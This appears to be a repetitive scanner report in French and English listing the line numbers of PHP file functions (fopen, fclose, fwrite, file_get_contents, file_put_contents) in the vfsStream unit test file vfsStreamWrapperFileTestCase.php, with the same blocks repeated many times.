    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fwrite was found in the file vfsStreamWrapperFileTestCase.php
    Ligne179: fwrite($fp, 'd');
    Ligne193: fwrite($fp, 'test');
    Ligne250: $this->assertEquals(0, fwrite($fp, 'foo'));
    Ligne264: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne280: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne297: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne339: fwrite($fp, 'some content');
    Ligne353: fwrite($fp, 'some content');
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fwrite was found in the file vfsStreamWrapperFileTestCase.php
    Ligne179: fwrite($fp, 'd');
    Ligne193: fwrite($fp, 'test');
    Ligne250: $this->assertEquals(0, fwrite($fp, 'foo'));
    Ligne264: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne280: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne297: $this->assertEquals(3, fwrite($fp, 'foo'));
    Ligne339: fwrite($fp, 'some content');
    Ligne353: fwrite($fp, 'some content');
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    file_get_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne18: * assert that file_get_contents() delivers correct file contents
    Ligne22: public function file_get_contents()
    Ligne24: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne25: $this->assertEquals('baz 1', file_get_contents($this->baz1URL));
    Ligne26: $this->assertFalse(@file_get_contents($this->barURL));
    Ligne27: $this->assertFalse(@file_get_contents($this->fooURL));
    Ligne35: public function file_get_contentsNonReadableFile()
    Ligne40: $this->assertEquals('', @file_get_contents(vfsStream::url('root/new.txt')));
    Ligne69: $this->assertEquals('This does work.', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne84: $this->assertEquals('content', file_get_contents(vfsStream::url('root/new.txt')));
    Ligne166: $this->assertEquals('d', file_get_contents($vfsFile));
    Ligne181: $this->assertEquals('testd', file_get_contents($vfsFile));
    Ligne195: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne208: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne252: $this->assertEquals('baz2', file_get_contents($this->baz2URL));
    Ligne268: $this->assertEquals('foo', file_get_contents($this->baz2URL));
    Ligne284: $this->assertEquals('baz2foo', file_get_contents($this->baz2URL));
    Ligne301: $this->assertEquals('foo', file_get_contents($vfsFile));
    Ligne327: $this->assertEquals('', file_get_contents($vfsFile));
    Ligne342: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne356: $this->assertEquals('some content', file_get_contents($vfsFile));
    Ligne368: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne394: $this->assertEquals('test', file_get_contents($vfsFile));
    Ligne455: $this->assertFalse(@file_get_contents($this->baz1URL));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    file_put_contents was found in the file vfsStreamWrapperFileTestCase.php
    Ligne44: * assert that file_put_contents() delivers correct file contents
    Ligne48: public function file_put_contentsExistingFile()
    Ligne50: $this->assertEquals(14, file_put_contents($this->baz2URL, 'baz is not bar'));
    Ligne52: $this->assertEquals(6, file_put_contents($this->baz1URL, 'foobar'));
    Ligne54: $this->assertFalse(@file_put_contents($this->barURL, 'This does not work.'));
    Ligne55: $this->assertFalse(@file_put_contents($this->fooURL, 'This does not work, too.'));
    Ligne63: public function file_put_contentsExistingFileNonWritableDirectory()
    Ligne68: $this->assertEquals(15, @file_put_contents(vfsStream::url('root/new.txt'), 'This does work.'));
    Ligne78: public function file_put_contentsExistingNonWritableFile()
    Ligne83: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne88: * assert that file_put_contents() delivers correct file contents
    Ligne92: public function file_put_contentsNonExistingFile()
    Ligne94: $this->assertEquals(14, file_put_contents($this->fooURL . '/baznot.bar', 'baz is not bar'));
    Ligne96: $this->assertEquals(14, file_put_contents($this->barURL . '/baznot.bar', 'baz is not bar'));
    Ligne105: public function file_put_contentsNonExistingFileNonWritableDirectory()
    Ligne109: $this->assertFalse(@file_put_contents(vfsStream::url('root/new.txt'), 'This does not work.'));
    Ligne164: file_put_contents($vfsFile, 'test');
    Ligne165: file_put_contents($vfsFile, 'd');
    Ligne177: file_put_contents($vfsFile, 'test');
    Ligne206: file_put_contents($vfsFile, 'test');
    Ligne325: file_put_contents($vfsFile, 'test');
    Ligne366: file_put_contents($vfsFile, 'test');
    Ligne379: file_put_contents($vfsFile, 'test');
    Ligne392: file_put_contents($vfsFile, 'test');
    Ligne405: file_put_contents($vfsFile, 'test');
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fclose was found in the file vfsStreamWrapperFileTestCase.php
    Ligne138: $this->assertTrue(fclose($fp));
    Ligne180: fclose($fp);
    Ligne194: fclose($fp);
    Ligne251: fclose($fp);
    Ligne267: fclose($fp);
    Ligne283: fclose($fp);
    Ligne300: fclose($fp);
    Ligne328: fclose($fp);
    Ligne341: fclose($fp);
    Ligne355: fclose($fp);
    Ligne369: fclose($fp);
    Ligne382: fclose($fp);
    Ligne395: fclose($fp);
    Ligne408: fclose($fp);
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
    Ligne207: $this->assertFalse(@fopen($vfsFile, 'xb'));
    Ligne218: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb'));
    Ligne228: $this->assertFalse(@fopen(vfsStream::url('foo/doesNotExist.txt'), 'rb+'));
    Ligne238: $this->assertFalse(@fopen($this->baz2URL, 'invalid'));
    Ligne248: $fp = fopen($this->baz2URL, 'rb');
    Ligne262: $fp = fopen($this->baz2URL, 'wb');
    Ligne278: $fp = fopen($this->baz2URL, 'ab');
    Ligne295: $fp = fopen($vfsFile, 'xb');
    Ligne326: $fp = fopen($vfsFile, 'wb');
    Ligne338: $fp = fopen($vfsFile, 'cb');
    Ligne352: $fp = fopen($vfsFile, 'cb+');
    Ligne367: $fp = fopen($vfsFile, 'cb');
    Ligne380: $fp = fopen($vfsFile, 'cb');
    Ligne393: $fp = fopen($vfsFile, 'cb+');
    Ligne406: $fp = fopen($vfsFile, 'cb+');
    Ligne417: $this->assertFalse(@fopen($this->baz1URL, 'a'));
    Ligne426: $this->assertFalse(@fopen($this->baz1URL, 'w'));
    Ligne435: $this->assertFalse(@fopen($this->baz1URL, 'r'));
    fopen was found in the file vfsStreamWrapperFileTestCase.php
    Ligne121: $fp = fopen($this->baz1URL, 'r');
    Ligne174: fOpenedWithModeA()
    Ligne178: $fp = fopen($vfsFile, 'ab');
    Ligne192: $fp = fopen($vfsFile, 'xb');
